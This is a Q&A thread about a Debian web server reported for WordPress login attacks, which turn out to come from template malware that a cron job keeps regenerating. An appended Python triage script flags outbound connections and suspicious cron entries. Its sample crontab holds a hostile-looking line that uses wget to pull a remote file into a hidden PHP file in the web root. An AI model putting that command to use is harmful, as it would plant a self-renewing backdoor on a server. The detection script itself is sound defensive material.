
I have a server that has been reported as an attacker since January. Today I finally found some information about these attacks; however, none of the logs on my server show anything similar. As a consequence, the IP is being banned in many blacklists, which is causing big problems for my Postfix users.

As can be seen in the attack logs, these are carried out through a browser on Windows NT; however, my server is a Debian 9. Here are some examples; 62.X.X.X is my IP (sensitive information removed):

    62.X.X.X - - [01/Mar/2021:14:25:28 +0000] 80 "GET /wp-login.php HTTP/1.1" 403 794 "-" "Mozilla/5.0(Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"

xmlrpc attack

WP-xmlrpc exploit

    Mar 1 06:52:53 h2880623 wordpress(www.zzzzz.zz)[6547]: XML-RPC authentication attempt for unknown user [login] from 62.X.X.X

    uvcm 62.X.X.X [27/Feb/2021:19:47:01 "-" "POST /wp-login.php 200 1946
    62.X.X.X [28/Feb/2021:12:01:03 "-" "GET /wp-login.php 200 5753
    62.X.X.X [28/Feb/2021:12:01:05 "-" "POST /wp-login.php 200 5872

    62.X.X.X - - [27/Feb/2021:19:09:53 +0100] "POST /wp-login.php HTTP/1.1" 200 2661 "-" "Mozilla/5.0(Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"
    62.X.X.X - - [27/Feb/2021:19:09:54 +0100] "POST /wp-login.php HTTP/1.1" 200 2637 "-" "Mozilla/5.0(Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"
    62.X.X.X - - [27/Feb/2021:19:10:00 +0100] "POST /wp-login.php HTTP/1.1" 200 2636 "-" "Mozilla/5.0(Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"

etc., etc.

Can someone spoof my ip to perform those attacks? Can I do something to mitigate it?

Edit: I already read this post a long time ago: How do I deal with a compromised server?, and followed it carefully, but even after following those recommendations my server got compromised, or there is something else going on that is out of my scope.

spacebiker

  • HTTP/1.1 is transmitted via TCP, meaning nobody can feasibly use that IP at the same time as you do. Someone is using your server for malicious purposes. And no, the fact that the attacker filled that arbitrary informational field with a line resembling Firefox on Windows does not mean anything at all. – anx Mar 04 '21 at 12:47
  • Does this answer your question? [How do I deal with a compromised server?](https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server) – anx Mar 04 '21 at 12:47
  • About the other question: [Can the IP address for an HTTP request be spoofed?](https://serverfault.com/questions/381393/can-the-ip-address-for-an-http-request-be-spoofed) – anx Mar 04 '21 at 12:49
  • Hi @anx, thanks for your replies. I knew about the first post and I already followed that advice a long time ago; that's why I am astonished, because I work every day on the server to keep it secure and I cannot find anything relevant in any log, so if there is somebody in, he is very good at his task. – spacebiker Mar 04 '21 at 16:18
  • To be honest, I suspect that there is nobody in, but there is some bad guy from the competitors who wants to knock me out by creating a bad reputation for my IP. I am not so vain as to think that I am the best IT guy in the world and that nobody can penetrate my system, but what I have been able to investigate so far leads me to think like this. In fact, I got the attack logs from abuseipdb.com, which is a system where anybody can report what they want. In the end, the truth is that I have been blacklisted every day for the last 4 days. – spacebiker Mar 04 '21 at 16:27
  • And last but not least, TCP spoofing is not impossible. This has been known for many years: https://www.jakoblell.com/blog/2013/08/13/quick-blind-tcp-connection-spoofing-with-syn-cookies/ – spacebiker Mar 04 '21 at 17:02
  • It is extraordinarily improbable for a _single_ blind TCP spoofing attack to succeed, let alone dozens or hundreds of them against many other hosts. Your server is still compromised. That is what you need to deal with. – Michael Hampton Mar 04 '21 at 17:32
  • @anx, I am not accusing anybody. I have had an account for a long time and they didn't ask me for much information to register and to send attack reports. I have always sent true information, but it is very easy to send fake reports. You can create an account and you will see how easy it would be to send fake attacks. My server might be compromised, I do not know yet, but I think what I say makes sense, at least for me. Thank you anyway for your replies and useful information ;) – spacebiker Mar 04 '21 at 21:21

1 Answer


I finally managed to fix the problem. After much analysis I found the damn malware that was running on the server, all due to an infected template installed by a third party. Somehow, the malware had managed to create a cron job to regenerate itself: maldet was deleting the offending PHP code, but because of that cron job the malware was regenerated.

So the answer to my first question, as @anx and @Michael pointed out, is absolutely "NO": someone did not spoof my IP to perform those attacks. And the answer to "Can I do something to mitigate it?" is: investigate.

  1. Check for open connections:

    lsof -Pnl +M -i4

  2. Check the logs (syslog, auth.log, Apache or nginx, etc.).

You can follow the recommendations I wrote in this answer: https://superuser.com/a/792971/123200

spacebiker
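The two checks the answer recommends (open connections, then the persistence that keeps regenerating the malware) can be turned into a small triage script. The following is an added example and is not code from the question or the answer. It parses the output of the `lsof -Pnl +M -i4` command given above (with `-l`, lsof prints numeric UIDs in the USER column) and a user's crontab, and flags two things: a web-server process (UID 33, Debian's `www-data`) that has *opened* a TCP connection to another host from an ephemeral port, which is exactly what makes a server show up in other people's `wp-login.php` access logs, and a cron entry that downloads from a URL into the web root. The lsof and crontab text, the server address 192.0.2.10 and the remote hosts are all constructed samples from documentation ranges, and the web-root and UID constants are assumptions to adjust for your host.

```python
"""Triage helpers for a web server that is being reported as an attack source.

Added example, not from the original question or answer. Parses constructed
`lsof -Pnl +M -i4` and `crontab -l` output and flags (1) web-server processes
holding outbound TCP connections and (2) cron entries that re-download files
into the web root. All addresses below are documentation ranges, not real hosts.
"""
import re
from typing import Dict, List

# Assumption: Debian's www-data UID; with `lsof -l` USER is the numeric UID.
WEB_SERVER_UIDS = {33}
# A server process whose *local* port is ephemeral initiated the connection
# itself; the remote side holds the service port.
EPHEMERAL_MIN = 32768

# Constructed sample of `lsof -Pnl +M -i4` on a Debian 9 host
# (192.0.2.10 stands in for the server's public address).
SAMPLE_LSOF = """\
COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
apache2  1234   33   12u  IPv4  41235      0t0  TCP 192.0.2.10:80->203.0.113.5:51234 (ESTABLISHED)
apache2  1234   33   14u  IPv4  41240      0t0  TCP 192.0.2.10:51800->198.51.100.7:80 (ESTABLISHED)
sshd      890    0    3u  IPv4   9000      0t0  TCP *:22 (LISTEN)
php      4411   33    5u  IPv4  52211      0t0  TCP 192.0.2.10:44120->198.51.100.9:443 (ESTABLISHED)
smtpd    2201  106    7u  IPv4  33100      0t0  TCP 192.0.2.10:25->203.0.113.77:40011 (ESTABLISHED)
"""

# Constructed sample of `crontab -l -u www-data` (a user that normally has
# no crontab at all on a Debian web host).
SAMPLE_CRON = """\
# m h dom mon dow command
*/5 * * * * wget -q -O /var/www/html/wp-content/uploads/.cache.php http://203.0.113.9/p.txt
0 3 * * * /usr/local/bin/backup-db.sh
"""

# One ESTABLISHED IPv4 TCP line: COMMAND PID UID FD TYPE DEVICE SIZE/OFF NODE NAME
LSOF_LINE = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<uid>\d+)\s+\S+\s+IPv4\s+\S+\s+\S+\s+TCP\s+"
    r"(?P<local>\S+)->(?P<remote>\S+)\s+\(ESTABLISHED\)"
)


def parse_lsof(text: str) -> List[Dict]:
    """Return the ESTABLISHED IPv4 TCP connections from lsof -Pnl -i4 output."""
    conns = []
    for line in text.splitlines():
        m = LSOF_LINE.match(line)
        if not m:
            continue  # header line, LISTEN sockets, UDP, etc.
        lhost, lport = m["local"].rsplit(":", 1)
        rhost, rport = m["remote"].rsplit(":", 1)
        conns.append({
            "cmd": m["cmd"], "pid": int(m["pid"]), "uid": int(m["uid"]),
            "local_port": int(lport), "remote": rhost, "remote_port": int(rport),
        })
    return conns


def outbound_from_web_server(conns: List[Dict]) -> List[Dict]:
    """Connections that a web-server process opened *to* another host.

    An apache2 worker or PHP handler should be answering on port 80/443, not
    dialling out from an ephemeral port; such sockets are the ones worth
    tracing back to the script that opened them.
    """
    return [c for c in conns
            if c["uid"] in WEB_SERVER_UIDS and c["local_port"] >= EPHEMERAL_MIN]


def suspicious_cron_entries(crontab_text: str, web_roots=("/var/www",)) -> List[str]:
    """Cron lines that fetch from a URL and write into the web root (re-infection)."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fetches = re.search(r"\b(wget|curl)\b", line) is not None and "http" in line
        touches_webroot = any(root in line for root in web_roots)
        if fetches and touches_webroot:
            hits.append(line.strip())
    return hits


if __name__ == "__main__":
    for c in outbound_from_web_server(parse_lsof(SAMPLE_LSOF)):
        print(f"outbound from {c['cmd']}[{c['pid']}] uid={c['uid']} -> "
              f"{c['remote']}:{c['remote_port']}")
    for entry in suspicious_cron_entries(SAMPLE_CRON):
        print("cron re-infection candidate:", entry)
```

On a live host, feed the script the real output (`lsof -Pnl +M -i4` and `crontab -l -u www-data`, plus `/etc/cron.d` and the `cron.*` directories), and for every flagged connection look up the PID with `ls -l /proc/<pid>/cwd` and `/proc/<pid>/fd` to find the PHP file that opened it; a cron entry owned by the web-server user is itself a finding, whether or not it matches the download heuristic.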